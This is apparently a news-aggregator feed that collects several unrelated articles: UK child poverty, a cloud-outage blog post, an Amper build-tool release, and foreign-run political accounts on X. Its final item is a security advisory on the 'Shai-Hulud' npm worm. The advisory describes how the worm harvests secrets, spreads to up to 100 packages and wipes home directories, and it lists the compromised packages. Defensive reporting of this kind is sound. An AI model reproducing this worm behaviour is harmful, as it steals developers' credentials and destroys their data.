Renata Acioli (center), who manages Little Village's baby bank in Wembley, is pictured with fellow staff members Sharna Singh (left) and Yosr Bahr (right).

But academics and advocates say policy decisions have also played a part. Britain’s public services were slashed by the center-right Conservative-led coalition and subsequent Conservative government in power from 2010 to 2024.

And as part of its austerity program, which aimed to reduce public spending in the wake of the 2008 financial crisis, the Conservatives introduced three policies that “are very largely responsible for the increase in child poverty today,” said Jonathan Bradshaw, an emeritus professor of social policy at the University of York who also served as one of the academic advisers to the current government’s upcoming child poverty strategy.

These limited the amount of welfare people are eligible to claim – one is an overall cap on the benefits a household can receive, another limits housing benefits and the third is a two-child benefit cap, meaning that parents cannot claim anything for their third or subsequent children born after 2017.

Charities and academics say it is this two-child benefit cap in particular that is largely responsible for Britain’s rising rates of child poverty.

“Most of the increase in child poverty has occurred in large families,” Bradshaw told CNN.

Britain's former finance minister, George Osborne, was one of austerity's key architects.

All this demonstrates the “inadequacy of the benefits system,” says Peter Matejic, chief analyst at the Joseph Rowntree Foundation.

“If you tot up how much you need for food, energy, all these things, and look at how much (benefits are)… it’s below that level,” he told CNN.

When UN envoys Philip Alston and Olivier De Schutter visited the UK in 2018 and 2023, respectively, they both condemned the poverty they saw there, though De Schutter noted that the country conformed to a pattern of increasing inequality seen in other wealthy countries.

A spokesperson for the current Labour government, which has been in power since July last year, told CNN that “every child, no matter their background, deserves the best start in life.”

“We are investing £500 million in children’s development through the rollout of Best Start Family Hubs, extending free school meals and ensuring the poorest don’t go hungry in the holidays through a new £1 billion crisis support package.”

Addressing child poverty has been a stated priority for the center-left government and, at the same time, an issue that illuminates the fault lines within it.

Ever since Labour came to power, it has grappled with balancing the mandate for change on which it was elected, and its traditional inclination to invest in public services, with scant available funds and a manifesto pledge not to increase taxes on working people.

Its plans to reduce child poverty have thus far been stymied by this conundrum. More details of the government’s spending and tax plans are due to be unveiled Wednesday, in which Chancellor Rachel Reeves, the UK’s finance minister, is expected to address the two-child benefit cap, a policy the government has oscillated between keeping and scrapping for the past year.

But for parents already on the breadline, their household budgets have been stretched too thin, for too long.

“People have got no resilience left,” says Livingstone, remembering that when she first began her role as the head of Little Village “we were talking about the safety net having lots of holes in it.”

“I’m actually not sure that there is much of a safety net anymore,” she says.

A New Raspberry Pi Imager

Hacker News
www.raspberrypi.com
2025-11-24 16:52:21
Comments...

On Modelling Agent Systems with Erlang (2004)

Lobsters
erlang.org
2025-11-24 16:48:36
Comments...
Original Article
No preview for link for known binary extension (.pdf), Link: https://erlang.org/workshop/2004/carlosvarela.pdf.

France threatens GrapheneOS with arrests / server seizure for refusing backdoors

Hacker News
grapheneos.social
2025-11-24 16:40:22
Comments...
Original Article

You are leaving grapheneos.social.

If you trust this link, click it to continue.

https://goingdark.social/@watchfulcitizen/115605398411708768

Misunderstanding that “Dependency” comic

Lobsters
bertptrs.nl
2025-11-24 16:17:35
Comments...
Original Article

Over the course of 2025, every single major cloud provider has failed. In June, Google Cloud had issues taking down Cloud Storage for many users. In late October, Amazon Web Services had a massive outage in their main hub, us-east-1 , affecting many services as well as some people’s beds . A little over a week later Microsoft Azure had a widespread outage that managed to significantly disrupt train service in the Netherlands , and probably also things that matter. Now last week, Cloudflare takes down large swaths of the internet in a way that causes non-tech people to learn Cloudflare exists. And every single time, people share that one XKCD comic.

XKCD 2347: Dependency

XKCD 2347: Dependency . Original caption: “Someday ImageMagick will finally break for good and we’ll have a long period of scrambling as we try to reassemble civilization from the rubble.”

Except the random person in Nebraska has been replaced by AWS, Google Cloud, or whoever caused the outage this week. And that kind of bothers me, because it misses the point entirely.

Cloud providers aren’t small indie companies

The original comic is a joke and expression of concern at the fact that lots of our modern technology depends on small projects that largely are maintained by a single driven developer writing code in their spare time. They are important, yet fragile. This is not comparable to the outages we’ve seen this year.

To contrast, these four cloud providers are, for better or worse, important to the web as we know it. But they’re not small. We should recognize that these are huge players, with revenues larger than the GDP of many countries. 1 Cloudflare isn’t anywhere near as big as the other three, but it still has a proportionally gigantic impact on the web due to how much data flows through them.

In addition to how important they are, they are all also among the largest and most valuable companies in the world. It’s concerning how reliant we are on just this handful of players, and when governments become more reliant on them , that is a huge risk. It is however the same, boring risk of influence and dependence it always is with large companies, rather than a risk of single individuals disappearing and taking our technology with them.

Support your guy in Nebraska

There are many people who are effectively a one-man show supporting most of modern technology in their spare time without compensation, and those deserve our support as a society, or at the very least recognition. I’ve tried to highlight a few here.

  • The comic waves at ImageMagick, which was created by John Cristy while working at DuPont. This is really the only fact I can find about it. Every article delving into the history of ImageMagick mentions this and nothing else. I don’t know much about John Cristy, so I can’t comment on him. However, ImageMagick is currently maintained by Dirk Lemstra , who lives in the Netherlands. He does appear to do this all in his spare time.

  • Finnish developer Lasse Collin is the main force behind the XZ compression library . Unfortunately, he is more famous for the social engineering attack on him than he is for his work. Regardless, XZ is an essential piece of software for many ecosystems that require high compression rate regardless of CPU cost. It has been the Arch Linux package compression algorithm of choice for years until it was replaced with zstd .

  • cURL developer and AI slop victim Daniel Stenberg has surprisingly beaten the odds and made a career out of maintaining his open source project, but that doesn’t make him less admirable. Did I recommend his blog enough yet? He lives in Stockholm, Sweden.

  • The late Bram Moolenaar is known for two things: the VIM text editor, and his support for orphaned children in Uganda. The latter of the two has long been the first message you see when opening the former. He lived in Lisse, the Netherlands, and the editor he created continued to be one of the most important tool on the belt of system administrators everywhere.

This is not meant to be an exhaustive list, though if I’ve overlooked someone significant (perhaps actually in Nebraska?) then don’t take that as me disregarding their contributions. There are many more, but the very nature of who they are prevents listing them all. I might update this list for a while, so do get in touch. 2

What next?

Relevant XKCD comics are nothing new to the field. When I was still in university I was educated 3 by my friends on the ones that apply most often. I have since become part of the problem and have been making references to it with others. In a way it’s a rite of passage for a certain kind of geek. So here I am trying to educate the next generation on what things mean.

On the bright side: some people on Reddit do appear to “get it” and point out the sheer ridiculousness of implying the cloud providers are tiny unassuming parts. Others have instead taken the joke and ran with it, off of a cliff , to the point where it no longer makes sense. By the time I finish writing this, it’s probably already old and not funny any more. Nature is healing, I suppose.


Amper Update, November 2025 – Extensibility Preview

Lobsters
blog.jetbrains.com
2025-11-24 16:08:27
Comments...
Original Article

Amper Update, November 2025 – Extensibility Preview

Amper 0.9.0 is out, and it brings the first version of our extensibility prototype! Read on for all of the details, and see the release notes for the full list of changes and bug fixes.

To get support for Amper’s latest features, use IntelliJ IDEA 2025.3 Beta (or newer).

New Amper website

We revamped our documentation and turned it into a brand new website! You no longer have to read Markdown files on GitHub. We hope you’ll enjoy the new structure, as well as the navigation and search functionality.

Check it out at https://amper.org .

Extensibility preview

It’s finally here: our first preview of Amper’s extensibility!

Our philosophy is to give a “batteries included” experience to our users, and this is why we want Amper to cover the most common use cases out of the box. However, a lot of projects have special needs, and the built-in behavior falls short eventually. To address this, Amper now offers the option to write custom tasks and expose them to your modules via plugins.

Note: Only local plugins are supported at the moment, but we will soon add the ability to publish and share plugins.

In Amper 0.9.0, you can create modules with the new jvm/amper-plugin product type. These modules contain the Kotlin code implementing your custom tasks, and a plugin.yaml file to register your tasks and their inputs and outputs.

Why do you need to use both Kotlin and YAML? As usual with Amper, tooling is paramount. Thanks to this approach, you will get nice diagnostics in case you make mistakes with your task wiring. Don’t worry, though, navigating between YAML and Kotlin is already seamless with the current basic IDE support.

Task dependencies are automatically inferred based on inputs and outputs, and task avoidance is already available by default. Inputs can be simple scalar values or files, or even your module’s compile or runtime classpath – thanks to the built-in Classpath type. Outputs can be regular files, but they can also be registered as generated sources or resources so the rest of the build takes them into account.

Build your own plugin from scratch by following our plugin quick-start guide , and tell us what you think in our Slack channel or in a YouTrack issue .

Please bear in mind that this preview is incomplete, and many more features will come in the future, including:

  • The ability to publish plugins and share them with other projects.
  • Templates that are bundled with your plugin to add configuration to the consumer module.
  • Reduced boilerplate when writing tasks that are only used in a single module.
  • Services and libraries for common task-authoring needs.
  • More IDE quick-fixes and intention actions.

Learn more about the current and future state in our plugin documentation .

Dependency resolution performance improvements

The dependency resolution phase was previously a performance bottleneck, especially during IDE import and sync.

Even though all downloaded files are locally cached and reused, building the dependency graph itself takes time, as Amper needs to read all the local pom.xml and Gradle metadata files. Amper now caches the dependency graph itself and reuses it when your dependencies haven’t changed, which can sometimes save tens of seconds on hot caches!

There is certainly more we can do here, and we’ll continue improving dependency resolution performance, so stay tuned!

Incremental compilation for Java

Amper has had task avoidance since day one, which means that it skips the whole compilation task of a module if its sources and dependencies haven’t changed. However, this doesn’t help if you have a large module with lots of sources, because any change in any file will cause the recompilation of the whole module.

This is where incremental compilation comes in. In Amper 0.9.0, you can use our incremental Java compilation engine, which recompiles only what’s necessary based on the exact changes in the module sources. Any change in your sources will still cause the compilation task to run, but now the task itself will be faster.

To enable this feature, simply add the following to your module.yaml file:

settings:
  java:
    compileIncrementally: true

Maven-like layout support

Amper’s default directory layout is simple and concise, and we love it. That said, we do understand that transitioning from Maven or Gradle is quite tedious and error-prone if it involves moving all files around. This is particularly painful if you want to try out Amper in a separate long-lived Git branch and get updates from your main branch.

As of Amper 0.9.0, you can choose to keep your sources and resources in the conventional Maven directory layout, so you don’t have to move your existing files immediately:

To do so, add layout: maven-like to your module.yaml file. If you intend to do this for all your modules, use a template to handle this in a central place.

Note: The maven-like layout is only available for the “jvm/app” and “jvm/lib” product types.

Library catalog at the project root

Amper now supports placing your Gradle-style version catalog ( libs.versions.toml ) in the project root instead of in the gradle folder. Of course, you are free to keep using gradle/libs.versions.toml if you want to keep compatibility with your Gradle layout.

In the IDE, using intention actions to extract dependencies to a new catalog will now create the catalog in the project root.

Note: You can only use a single library catalog for your project, so you have to pick one of the locations.

IDE improvements

Auto-sync of the project configuration

Changes to your Amper configuration files are now automatically taken into account, which means you no longer need to manually click the Sync IntelliJ IDEA Sync button button!

This was made possible by the improvements in dependency resolution caching we’ve seen above.

If syncing involves downloading new dependencies or other lengthy processes, you’ll see a progress indicator in the status bar; otherwise, the sync should be seamless.

Note: This behavior can be configured for the current project in “Settings | Build, Execution, Deployment | Build Tools”. If you want to change the default for future new projects, you can do so in “Settings | Advanced Settings | Build Tools. Amper”.

Sync details

The Build tool window now provides more insights into the stages of the sync process, and shows errors and warnings arising from them.

IDE assistance for setting the main class

You can configure the entrypoint of a jvm/app module using settings.jvm.mainClass . Finding the fully-qualified name of your main class is never fun, though. This is why IntelliJ IDEA now provides completion for it directly in your YAML file!

The completion list includes all class names that have a valid main function. By default, only classes present in the module itself are shown, but you can also invoke completion a second time to get results from your dependencies too:

That’s not all. IntelliJ IDEA also provides assistance with navigation and resolution, and it will even warn you about the infamous missing Kt suffix when referring to the class Kotlin generates for top-level main functions.

Improved quick-fix for overridden catalog versions

Amper warns you when your module doesn’t get the requested version of a dependency because of dependency conflicts. However, when this happens with a library catalog dependency, it isn’t obvious what the fix should be, as it depends on your intent.

To address this issue, IntelliJ IDEA now offers two different quick-fixes: one to replace the catalog reference with an explicit version in the problematic module, and one to update the version in the catalog itself. Use Alt+Enter or click the More actions… option in the warning tooltip to access these fixes:

Dedicated color theme settings

You can now customize the colors in your Amper YAML files.

Head over to File | Settings | Editor | Color Scheme | Amper and get creative!

Updated default versions

We updated some of our default versions for toolchains and frameworks:

  • Kotlin 2.2.21
  • Compose Hot Reload 1.0.0-rc01
  • KSP 2.3.0
  • JUnit Platform 6.0.1

Also, the default value for settings.jvm.release is now 21.

Try Amper 0.9.0

To update an existing project, use the ./amper update command.

To get started with Amper, check out our Getting started guide. Take a look at some examples, follow a tutorial, or read the comprehensive user guide depending on your learning style.

Share your feedback

Amper is still experimental and under active development. You can provide feedback about your experience by joining the discussion in the Kotlinlang Slack’s #amper channel or sharing your suggestions and ideas in a YouTrack issue . Your input and use cases help shape the future of Amper!

X Just Accidentally Exposed a Covert Influence Network Targeting Americans

Hacker News
weaponizedspaces.substack.com
2025-11-24 16:07:40
Comments...
Original Article

A new feature on X has revealed that a huge number of large, divisive political accounts claiming to be Trump supporters are actually operating out of foreign countries. The discovery — likely the most sweeping public exposure of covert foreign activity on a major platform since the revelations about Russia in 2016 — raises serious concerns about covert foreign influence in U.S. political discourse, mirroring the Russian disinformation campaign in which operatives from Russia’s Internet Research Agency posed as U.S. persons to interfere in the election.

The new feature on X allows users to see the approximate place where an account was created and is primarily operating from, rather than having to rely solely on an account operator’s self-reported location. The move was made to boost transparency and enhance the authenticity of discussions on the platform, but it immediately became apparent that the new feature would have an additional effect: exposing foreign accounts that are posing as Americans.

On Saturday, X users found scores of pro-Trump and MAGA accounts that were trying to pass as Americans but were operated from countries in Europe, Asia, Africa, and elsewhere. X acknowledges that some of the operating locations may actually be the location of a VPN service rather than the location of the account owner, but the sheer number of accounts operating from outside of the United States makes it clear that not all of these are simply proxy locations. Furthermore, some of these accounts had listed their locations as being within the U.S., and some were operating with usernames such as (@)American despite being operated from overseas. As X Product Chief Nikita Bier explained , if an account claims to be from a U.S. location but the data shows it’s based overseas, that discrepancy is a red flag suggesting the account “might have another agenda.”

A few examples of large MAGA accounts posing as Americans while operating from a foreign country. A few examples of large MAGA accounts posing as Americans while operating from a foreign country. A few examples of large MAGA accounts posing as Americans while operating from a foreign country.
A few examples of large MAGA accounts posing as Americans while operating from a foreign country. A few examples of large MAGA accounts posing as Americans while operating from a foreign country. A few examples of large MAGA accounts posing as Americans while operating from a foreign country.
A few examples of large MAGA accounts posing as Americans while operating from a foreign country.

While location-based discrepancies were found among all types of accounts, the most noticeable and largest group of accounts revealed to be operating from overseas were those reporting to be Trump fans, many of whom described themselves as “Patriots” who champion “America First” politics. For instance, a prominent account called “MAGA NATION” (with 392,000+ followers) turned out to be posting from Eastern Europe, not America. Other examples include “Dark MAGA” (15,000 followers, based in Thailand), “MAGA Scope” (51,000 followers, based in Nigeria), and an “America First” account (67,000 followers) run from Bangladesh. Other large political, crypto, and even public health influencer accounts claiming U.S. roots — many of which are also MAGA-aligned — are similarly being outed with locations traced to countries like India, Nigeria, and elsewhere. In each case, an account that gave every impression of being an American political participant — complaining about gas prices or vaccine mandates, cheering or mocking candidates, reacting to debates, and posting memes about things like the border or inflation — was run by someone who isn’t even in America.

Thanks to a new X feature, we now know that this pro-Trump account called “American” is not, in fact, American.
Thanks to a new X feature, we now know that this pro-Trump account called “American” is not, in fact, American.

The exposure of foreign-run political accounts on X immediately calls to mind covert influence operations of the past – most notably, Russia’s meddling in the 2016 U.S. election. In 2016, Russia’s Internet Research Agency (IRA) infamously created countless fake social media personas impersonating Americans to sow discord and denigrate Hillary Clinton/boost Trump’s candidacy. According to the Mueller investigation’s conclusions and U.S. intelligence findings, these operatives “posed as U.S. persons…operated social media pages and groups designed to attract U.S. audiences…[and] falsely claimed to be controlled by U.S. activists when, in fact, they were controlled by [foreign actors].” Their strategy included using stolen identities and pretending to be grassroots American voices, all to infiltrate online communities and influence political opinion. By mid-2016 the IRA’s campaign explicitly focused on boosting Trump and disparaging Hillary Clinton, under orders from the Kremlin.

The pattern now emerging on X suggests history may be repeating itself, albeit likely with new actors and technologies. Or perhaps even more likely, these types of tactics never actually stopped in the first place. Covert foreign influence via social media remained a live threat in the run-up to the 2024 presidential election. In fact, investigative reporting by CNN in 2024 uncovered a campaign on X aimed at bolstering Trump’s candidacy – a network of at least 60 fake pro-Trump accounts using profile photos stolen from real women in Europe. These fake personas, posing as enthusiastic American Trump supporters, told U.S. voters to “vote for Trump in 2024” while the actual women depicted (from countries like Denmark, the Netherlands, and even Russia) had no idea their images were being misused.

The discovery — likely the most sweeping public exposure of covert foreign activity on a major platform since the revelations about Russia in 2016 — raises serious concerns about covert foreign influence in U.S. political discourse.

The geographic spread of the exposed accounts hints at a variety of possible culprits and motives. Some accounts originate in countries historically linked to disinformation targeting the U.S. (e.g. Russia or Eastern European locales) while others come from places like Nigeria, India, Thailand, or Kenya with no obvious state sponsor. This suggests we could be seeing multiple layers of foreign influence: both state-sponsored influence operations (Russia and others) trying to sway U.S. politics, as well as a cottage industry of opportunists and trolls for hire globally who exploit U.S. political tribalism for clout or profit. In 2016, for example, not only did Russian agents interfere, but so did independent foreign scammers – notably the notorious “Macedonian fake news farms” where teenagers churned out pro-Trump disinformation simply because it drew huge web traffic and ad revenue. Today’s foreign MAGA accounts could likewise be profit-driven grifters – people pretending to be patriotic Americans while actually just racking up followers and perhaps soliciting donations or earning X’s ad-share payouts from viral content.

The discovery that a significant number of political accounts – especially in the pro-Trump/MAGA sphere – are operated from abroad carries far-reaching implications. It validates warnings that covert foreign influence on social media did not end with 2016, but is an ongoing challenge to U.S. democracy and societal cohesion. The immediate impact is a jolt of awareness: both the public and policymakers can now see concrete examples of how outsiders try to shape American political conversations from afar. This awareness, thanks to X’s transparency feature, is a double-edged sword. On the one hand, it empowers users and authorities to identify and possibly neutralize foreign propaganda by calling it out and removing its mask of authenticity. On the other hand, it injects a new layer of skepticism and accusation into political discourse – people may reflexively dismiss opposing views as “just foreign bots,” and genuine activists might find themselves under suspicion if their location isn’t easily verified.

Thanks for reading Weaponized! This post is public so feel free to share it.

Share

Moving forward, we’ll likely see a re-examination of how much credence we give to social media as a barometer of public opinion. Lawmakers, campaigners, and journalists will need to vet online trends more carefully (e.g. check if a trending political hashtag is heavily driven by accounts from overseas). The platform implications for X are significant as well: X must decide whether it will actively clamp down on these foreign-run accounts or simply inform users and leave the content up. Its reputation as a platform for healthy political dialogue is on the line; too much manipulation could drive users to alternatives or invite regulatory backlash.

As for the rest of us, the implications are similar to those following the 2016 Russian campaign: we’re still under attack and likely have been this whole time.

I’ll return with a more detailed analysis of these revelations soon, so stay tuned.

Discussion about this post

SHA1-Hulud the Second Comming – Postman, Zapier, PostHog All Compromised via NPM

Hacker News
www.aikido.dev
2025-11-24 16:03:36
Comments...
Original Article

It's another Monday morning, sitting down at the computer. And I see a stack of alerts from the last hour of packages showing signs of malware in our triage queue. Having not yet finished my first cup of coffee, I see Shai Hulud indicators. Yikes, surely that's a false positive? Nope, welcome to Monday, Shai Hulud struck again. Strap in.

Timeline of the Shai-Hulud Campaign

The timing is notable, given npm’s recent announcement that it will revoke classic tokens on December 9 after the wave of supply-chain attacks. With many users still not migrated to trusted publishing, the attacker seized the moment for one more hit before npm’s deadline.

  • August 27 - We release our report detailing the S1ngularity campaign targeting several nx packages on npm.
  • September 16 - The attacker strikes again , launching the first wave of the Shai-Hulud attacks.
  • September 18 - We publish a follow-up analysis , diving deeper into the campaign’s technical quirks and early payload behavior.
  • November 24 - A second strike occurs, dubbed the “Second Coming” by the attackers, timed just before npm’s deadline for revoking old tokens.

What is Shai-Hulud?: A Quick Refresher

Shai-Hulud, named after the gigantic sandworms from Dune as part of the attacker's flair for theatrics, is a self-replicating npm worm built to spread quickly through compromised developer environments. Once it infects a system, it searches for exposed secrets such as API keys and tokens using TruffleHog and publishes anything it finds to a public GitHub repository . It then attempts to push new copies of itself to npm, helping it propagate across the ecosystem, while exfiltrating data back to the attacker. Keeping with the dramatic theme, the attacker refers to this latest wave as the “Second Coming.”

Differences from last time

This time around, there are some significant differences in the attack:

  • It install bun with the file setup_bun.js and then uses that to execute bun_environment.js which is the actual malicious code.
  • It creates a randomly named repository with stolen data, rather than a hardcoded name.
  • It will infect up to 100 npm packages, compared to 20 last time.
  • If it can't authenticate with GitHub or NPM, it will wipe all files in the users Home directory.

Which packages are affected?

We've detected the following packages compromised with a new version of Shai Hulud. Between all these 492 packages, they have a total of 132 million monthly downloads:

  • @asyncapi/diff
  • @asyncapi/nodejs-ws-template
  • go-template
  • @asyncapi/avro-schema-parser
  • @asyncapi/converter
  • @asyncapi/dotnet-rabbitmq-template
  • @asyncapi/nunjucks-filters
  • @asyncapi/protobuf-schema-parser
  • @asyncapi/problem
  • @asyncapi/optimizer
  • @asyncapi/python-paho-template
  • @asyncapi/multi-parser
  • @asyncapi/bundler
  • @asyncapi/php-template
  • asyncapi-preview
  • @asyncapi/java-spring-cloud-stream-template
  • @asyncapi/modelina-cli
  • @asyncapi/generator-helpers
  • @asyncapi/java-template
  • @asyncapi/react-component
  • @asyncapi/generator
  • @asyncapi/server-api
  • @asyncapi/java-spring-template
  • @asyncapi/cli
  • @asyncapi/web-component
  • @asyncapi/specs
  • @asyncapi/modelina
  • @asyncapi/parser
  • @asyncapi/html-template
  • @asyncapi/go-watermill-template
  • @asyncapi/openapi-schema-parser
  • @asyncapi/edavisualiser
  • @asyncapi/generator-components
  • dotnet-template
  • @asyncapi/keeper
  • github-action-for-generator
  • @asyncapi/nodejs-template
  • @asyncapi/markdown-template
  • @quick-start-soft/quick-git-clean-markdown
  • @quick-start-soft/quick-markdown-image
  • @quick-start-soft/quick-markdown-translator
  • @quick-start-soft/quick-markdown
  • test23112222-api
  • @asyncapi/generator-react-sdk
  • @quick-start-soft/quick-markdown-compose
  • iron-shield-miniapp
  • manual-billing-system-miniapp-api
  • shinhan-limit-scrap
  • @strapbuild/react-native-perspective-image-cropper
  • react-native-use-modal
  • @quick-start-soft/quick-task-refine
  • @strapbuild/react-native-date-time-picker
  • @strapbuild/react-native-perspective-image-cropper-2
  • create-glee-app
  • @strapbuild/react-native-perspective-image-cropper-poojan31
  • @asyncapi/studio
  • @quick-start-soft/quick-markdown-print
  • @quick-start-soft/quick-remove-image-background
  • eslint-config-zeallat-base
  • korea-administrative-area-geo-json-util
  • @quick-start-soft/quick-document-translator
  • axios-builder
  • posthog-node
  • @posthog/first-time-event-tracker
  • @posthog/event-sequence-timer-plugin
  • @posthog/gitub-star-sync-plugin
  • posthog-plugin-hello-world
  • @posthog/bitbucket-release-tracker
  • @posthog/maxmind-plugin
  • @posthog/postgres-plugin
  • @posthog/twilio-plugin
  • @posthog/cli
  • @posthog/clickhouse
  • @posthog/snowflake-export-plugin
  • posthog-react-native-session-replay
  • @posthog/drop-events-on-property-plugin
  • @posthog/github-release-tracking-plugin
  • @posthog/icons
  • @posthog/geoip-plugin
  • @posthog/intercom-plugin
  • @posthog/plugin-unduplicates
  • @posthog/react-rrweb-player
  • drop-events-on-property-plugin
  • @posthog/ingestion-alert-plugin
  • @posthog/kinesis-plugin
  • @posthog/laudspeaker-plugin
  • @posthog/nextjs
  • @posthog/nextjs-config
  • @posthog/automatic-cohorts-plugin
  • @posthog/migrator3000-plugin
  • @posthog/pagerduty-plugin
  • @posthog/plugin-contrib
  • @posthog/sendgrid-plugin
  • @posthog/customerio-plugin
  • @posthog/rrweb-utils
  • @posthog/taxonomy-plugin
  • @posthog/zendesk-plugin
  • @posthog/netdata-event-processing
  • @posthog/url-normalizer-plugin
  • posthog-docusaurus
  • @posthog/currency-normalization-plugin
  • @posthog/filter-out-plugin
  • @posthog/heartbeat-plugin
  • @actbase/react-native-fast-image
  • @posthog/ai
  • @posthog/databricks-plugin
  • @actbase/react-native-kakao-channel
  • calc-loan-interest
  • @actbase/react-absolute
  • @actbase/react-daum-postcode
  • @actbase/react-native-simple-video
  • @posthog/core
  • @posthog/lemon-ui
  • @seung-ju/next
  • @seung-ju/react-hooks
  • posthog-react-native
  • @actbase/css-to-react-native-transform
  • @actbase/react-native-actionsheet
  • @actbase/react-native-tiktok
  • @seung-ju/react-native-action-sheet
  • @actbase/react-kakaosdk
  • @posthog/agent
  • @posthog/variance-plugin
  • discord-bot-server
  • @posthog/rrweb-replay
  • @posthog/rrweb-snapshot
  • @actbase/node-server
  • @actbase/react-native-devtools
  • @posthog/plugin-server
  • @posthog/rrweb-record
  • @actbase/native
  • @actbase/react-native-less-transformer
  • @posthog/rrweb
  • posthog-js
  • @posthog/web-dev-server
  • @posthog/piscina
  • @posthog/nuxt
  • @posthog/rrweb-player
  • @posthog/wizard
  • @actbase/react-native-kakao-navi
  • @posthog/siphash
  • @posthog/twitter-followers-plugin
  • @actbase/react-native-naver-login
  • @seung-ju/openapi-generator
  • @posthog/rrdom
  • @posthog/hedgehog-mode
  • react-native-worklet-functions
  • expo-audio-session
  • poper-react-sdk
  • @postman/secret-scanner-wasm
  • @postman/csv-parse
  • @postman/node-keytar
  • @postman/tunnel-agent
  • @postman/pm-bin-macos-arm64
  • @postman/pm-bin-linux-x64
  • @postman/postman-collection-fork
  • @postman/postman-mcp-server
  • @postman/wdio-junit-reporter
  • @postman/aether-icons
  • @postman/postman-mcp-cli
  • @postman/pretty-ms
  • @postman/pm-bin-windows-x64
  • @postman/wdio-allure-reporter
  • @postman/final-node-keytar
  • @postman/pm-bin-macos-x64
  • @aryanhussain/my-angular-lib
  • capacitor-plugin-apptrackingios
  • capacitor-plugin-purchase
  • capacitor-purchase-history
  • capacitor-voice-recorder-wav
  • scgs-capacitor-subscribe
  • @postman/mcp-ui-client
  • capacitor-plugin-scgssigninwithgoogle
  • @kvytech/medusa-plugin-announcement
  • @kvytech/medusa-plugin-product-reviews
  • medusa-plugin-zalopay
  • scgsffcreator
  • @kvytech/habbit-e2e-test
  • medusa-plugin-logs
  • medusa-plugin-product-reviews-kvy
  • @kvytech/medusa-plugin-promotion
  • medusa-plugin-momo
  • @kvytech/components
  • medusa-plugin-announcement
  • @kvytech/cli
  • @kvytech/medusa-plugin-newsletter
  • @kvytech/medusa-plugin-management
  • @kvytech/web
  • create-hardhat3-app
  • test-hardhat-app
  • evm-checkcode-cli
  • gate-evm-tools-test
  • gate-evm-check-code2
  • web-types-htmx
  • test-foundry-app
  • web-types-lit
  • bun-plugin-httpfile
  • open2internet
  • vite-plugin-httpfile
  • @ensdomains/vite-plugin-i18next-loader
  • @ensdomains/blacklist
  • @ensdomains/durin
  • @ensdomains/renewal
  • @ensdomains/cypress-metamask
  • bytecode-checker-cli
  • @ensdomains/dnsprovejs
  • @ensdomains/ccip-read-dns-gateway
  • @ensdomains/ccip-read-cf-worker
  • @ensdomains/dnssec-oracle-anchors
  • @ensdomains/reverse-records
  • @ensdomains/ens-test-env
  • @ensdomains/hackathon-registrar
  • @ensdomains/renewal-widget
  • crypto-addr-codec
  • @ensdomains/solsha1
  • @ensdomains/server-analytics
  • @ensdomains/ui
  • @ensdomains/test-utils
  • @ensdomains/mock
  • @ensdomains/ccip-read-router
  • @zapier/babel-preset-zapier
  • @ensdomains/hardhat-chai-matchers-viem
  • @ensdomains/ccip-read-worker-viem
  • @zapier/browserslist-config-zapier
  • @zapier/zapier-sdk
  • @zapier/stubtree
  • zapier-async-storage
  • @zapier/ai-actions
  • @zapier/mcp-integration
  • @zapier/spectral-api-ruleset
  • @ensdomains/address-encoder
  • redux-router-kit
  • @ensdomains/eth-ens-namehash
  • zapier-scripts
  • @ensdomains/buffer
  • @ensdomains/thorin
  • zapier-platform-legacy-scripting-runner
  • zapier-platform-schema
  • @ensdomains/dnssecoraclejs
  • zapier-platform-core
  • @ensdomains/op-resolver-contracts
  • @ensdomains/ens-archived-contracts
  • @ensdomains/ensjs
  • @ensdomains/subdomain-registrar
  • @ensdomains/unruggable-gateways
  • @ensdomains/web3modal
  • zapier-platform-cli
  • @ensdomains/ens-contracts
  • @ensdomains/react-ens-address
  • @ensdomains/curvearithmetics
  • @zapier/secret-scrubber
  • @ensdomains/hardhat-toolbox-viem-extended
  • ethereum-ens
  • @ensdomains/durin-middleware
  • @ensdomains/unicode-confusables
  • @ensdomains/ensjs-react
  • @ensdomains/content-hash
  • @ensdomains/ens-avatar
  • @zapier/ai-actions-react
  • @zapier/eslint-plugin-zapier
  • @ensdomains/offchain-resolver-contracts
  • @ensdomains/ens-validation
  • @ensdomains/name-wrapper
  • @hapheus/n8n-nodes-pgp
  • @markvivanco/app-version-checker
  • claude-token-updater
  • n8n-nodes-tmdb
  • devstart-cli
  • skills-use
  • @mcp-use/inspector
  • zuper-sdk
  • zuper-stream
  • @mcp-use/mcp-use
  • create-mcp-use-app
  • mcp-use
  • @mcp-use/cli
  • zuper-cli
  • @caretive/caret-cli
  • cpu-instructions
  • lite-serper-mcp-server
  • @louisle2/core
  • jan-browser
  • exact-ticker
  • react-library-setup
  • orbit-soap
  • @orbitgtbelgium/mapbox-gl-draw-scale-rotate-mode
  • token.js-fork
  • react-component-taggers
  • @louisle2/cortex-js
  • orbit-nebula-editor
  • @trigo/pathfinder-ui-css
  • @trigo/jsdt
  • @trigo/atrix-redis
  • @trigo/eslint-config-trigo
  • @trigo/atrix-orientdb
  • @trigo/node-soap
  • eslint-config-trigo
  • @trigo/bool-expressions
  • @trigo/atrix-pubsub
  • @trigo/atrix-elasticsearch
  • @trigo/hapi-auth-signedlink
  • @trigo/keycloak-api
  • @trigo/atrix-soap
  • @trigo/atrix-swagger
  • @trigo/atrix-acl
  • atrix
  • redux-forge
  • @trigo/atrix-mongoose
  • @trigo/atrix
  • orbit-boxicons
  • atrix-mongoose
  • bool-expressions
  • react-element-prompt-inspector
  • trigo-react-app
  • @trigo/trigo-hapijs
  • @trigo/fsm
  • command-irail
  • @orbitgtbelgium/mapbox-gl-draw-cut-polygon-mode
  • @trigo/atrix-postgres
  • @orbitgtbelgium/time-slider
  • @orbitgtbelgium/orbit-components
  • orbit-nebula-draw-tools
  • typeorm-orbit
  • @mparpaillon/connector-parse
  • @mparpaillon/imagesloaded
  • @commute/market-data
  • gitsafe
  • @osmanekrem/error-handler
  • @commute/bloom
  • okta-react-router-6
  • designstudiouiux
  • itobuz-angular
  • @ifelsedeveloper/protocol-contracts-svm-idl
  • ito-button
  • @dev-blinq/cucumber_client
  • blinqio-executions-cli
  • itobuz-angular-auth
  • @dev-blinq/ai-qa-logic
  • axios-timed
  • react-native-email
  • tenacious-fetch
  • kill-port
  • jacob-zuma
  • luno-api
  • @lessondesk/eslint-config
  • sort-by-distance
  • just-toasty
  • image-to-uri
  • react-native-phone-call
  • formik-error-focus
  • jquery-bindings
  • @lessondesk/babel-preset
  • barebones-css
  • coinmarketcap-api
  • license-o-matic
  • @varsityvibe/api-client
  • pico-uid
  • hyperterm-hipster
  • set-nested-prop
  • bytes-to-x
  • enforce-branch-name
